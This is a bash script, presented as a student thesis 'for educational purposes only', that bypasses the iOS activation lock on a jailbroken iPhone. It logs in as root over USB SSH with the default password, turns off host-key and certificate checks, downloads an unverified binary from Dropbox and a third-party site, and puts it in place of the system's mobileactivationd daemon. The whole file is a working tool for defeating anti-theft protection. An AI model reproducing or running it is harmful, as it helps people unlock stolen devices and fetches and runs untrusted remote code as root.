#!/bin/bash

clear 
echo "-- Inicio -- "

rm -rf ~/.ssh/known_hosts
echo "==> Setting up SSH over USB..."
iproxy 2233 44 2> /dev/null &

runcmd () {
    sshpass -p alpine ssh -o StrictHostKeyChecking=no root@localhost -p 2233 "$1" > /dev/null
}



read -p "==> Tesis Creada por Johan Alexander Espinosa Rocuts presentada para la Uniminuto Sede Principal, solo para propósitos Educativos"
read -p "==> Conecta Tu Dispositivo Y Asegurate De Haber Aplicado Checkra1n"

wget --no-check-certificate https://www.dropbox.com/s/2wndumdtwhiemiw/bypass1?dl=0 ./bypass1?dl=0
wget --no-check-certificate http://imadcydia.com/bypass/thanks.rtf ./thanks.rtf
wget --no-check-certificate https://imadcydia.com/bypass/ByRemote2/sshpass ./sshpass

chmod 755 ./sshpass 

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 mount -o rw,union,update /

./sshpass -p alpine scp -rP 2233 -o StrictHostKeyChecking=no ./bypass1?dl=0 root@localhost:/usr/libexec/bypass1?dl=0

./sshpass -p alpine scp -rP 2233 -o StrictHostKeyChecking=no ./thanks.rtf root@localhost:/var/mobile/Media/Downloads/thanks.rtf


./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 mv /usr/libexec/mobileactivationd /usr/libexec/mobileactivationdbak

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 mv /usr/libexec/bypass1?dl=0 /usr/libexec/mobileactivationd

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 chmod 755 /usr/libexec/mobileactivationd

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 launchctl unload /System/Library/LaunchDaemons/com.apple.mobileactivationd.plist

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 launchctl load /System/Library/LaunchDaemons/com.apple.mobileactivationd.plist

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 cat /var/mobile/Media/Downloads/thanks.rtf

./sshpass -p "alpine" ssh -o StrictHostKeyChecking=no root@localhost -p 2233 rm /var/mobile/Media/Downloads/thanks.rtf

rm -rf ./thanks.rtf
rm -rf ./bypass1?dl=0

echo "Terminado."